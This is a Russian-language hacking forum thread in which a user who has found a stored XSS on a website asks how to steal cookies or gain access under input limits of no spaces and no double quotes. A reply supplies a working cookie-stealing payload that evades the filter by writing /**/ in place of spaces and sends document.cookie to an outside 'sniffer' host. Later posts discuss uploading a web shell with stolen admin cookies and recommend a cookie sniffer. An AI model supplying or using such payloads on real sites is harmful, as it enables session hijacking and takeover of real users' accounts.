Добрый вечер, помогите пожалуйста с информацией. Короче так) В этой области я могу залить любую строчку


Code:
Вот сюда


Работает активная XSS. Могу вызвать


Code:
alert('1')

Только вот нужно сформировать как-то строчку чтобы она была в одну строку и без пробела и ".

Как можно воровать куки или получить доступ к сайту не виходя из этих параметров.

За любую информацию буду вам очень благодарен!

Вместо пробела "/**/", вместо двойных кавычек одинарные. Пример:


Code:
(new/**/Image()).src='http://sniffer/?'+document.cookie

Спасибо большое! А можно как-то шелл залить через такие параметры?

Massay said:
Спасибо большое! А можно как-то шелл залить через такие параметры?


если ты с помощью телепатии узнаешь все параметры админки и сможешь сымитировать заливку шелла, то почему бы и нет.

Massay said:
Спасибо большое! А можно как-то шелл залить через такие параметры?



Если куки админа получишь, который может залить шелл, то да)

А через такие параметры - нет.

Ясно) хотел еще спросить у вас , какой хороший, бесплатный сниффер с возможностю сохранять большое количество логов

Massay said:
Ясно) хотел еще спросить у вас , какой хороший, бесплатный сниффер с возможностю сохранять большое количество логов


Analyzer - самый толковый по моему.

Ппц, написал ответ не посмотрев на даты *facepalm*

а что с датами? неделя всего прошла

Batmаn said:
а что с датами? неделя всего прошла


Ну по мне так автор уже забил на тему

Спасибо. Нет не забил =) Мне всегда интересно новая информация